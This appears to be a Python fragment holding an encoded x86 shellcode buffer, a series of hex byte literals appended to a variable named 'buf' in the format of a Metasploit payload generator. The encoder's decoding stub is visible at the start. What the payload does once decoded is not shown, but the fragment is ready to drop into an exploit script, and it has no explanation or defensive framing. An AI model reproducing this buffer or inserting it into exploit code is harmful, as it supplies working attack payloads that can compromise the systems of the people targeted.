buf =  b""
buf += b"\xbd\xb6\xbc\xe6\x0e\xdb\xcc\xd9\x74\x24\xf4\x5f"
buf += b"\x31\xc9\xb1\x31\x83\xef\xfc\x31\x6f\x0f\x03\x6f"
buf += b"\xb9\x5e\x13\xf2\x2d\x1c\xdc\x0b\xad\x41\x54\xee"
buf += b"\x9c\x41\x02\x7a\x8e\x71\x40\x2e\x22\xf9\x04\xdb"
buf += b"\xb1\x8f\x80\xec\x72\x25\xf7\xc3\x83\x16\xcb\x42"
buf += b"\x07\x65\x18\xa5\x36\xa6\x6d\xa4\x7f\xdb\x9c\xf4"
buf += b"\x28\x97\x33\xe9\x5d\xed\x8f\x82\x2d\xe3\x97\x77"
buf += b"\xe5\x02\xb9\x29\x7e\x5d\x19\xcb\x53\xd5\x10\xd3"
buf += b"\xb0\xd0\xeb\x68\x02\xae\xed\xb8\x5b\x4f\x41\x85"
buf += b"\x54\xa2\x9b\xc1\x52\x5d\xee\x3b\xa1\xe0\xe9\xff"
buf += b"\xd8\x3e\x7f\xe4\x7a\xb4\x27\xc0\x7b\x19\xb1\x83"
buf += b"\x77\xd6\xb5\xcc\x9b\xe9\x1a\x67\xa7\x62\x9d\xa8"
buf += b"\x2e\x30\xba\x6c\x6b\xe2\xa3\x35\xd1\x45\xdb\x26"
buf += b"\xba\x3a\x79\x2c\x56\x2e\xf0\x6f\x3c\xb1\x86\x15"
buf += b"\x72\xb1\x98\x15\x22\xda\xa9\x9e\xad\x9d\x35\x75"
buf += b"\x8a\x52\x7c\xd4\xba\xfa\xd9\x8c\xff\x66\xda\x7a"
buf += b"\xc3\x9e\x59\x8f\xbb\x64\x41\xfa\xbe\x21\xc5\x16"
buf += b"\xb2\x3a\xa0\x18\x61\x3a\xe1\x7a\xe4\xa8\x69\x53"
buf += b"\x83\x48\x0b\xab"
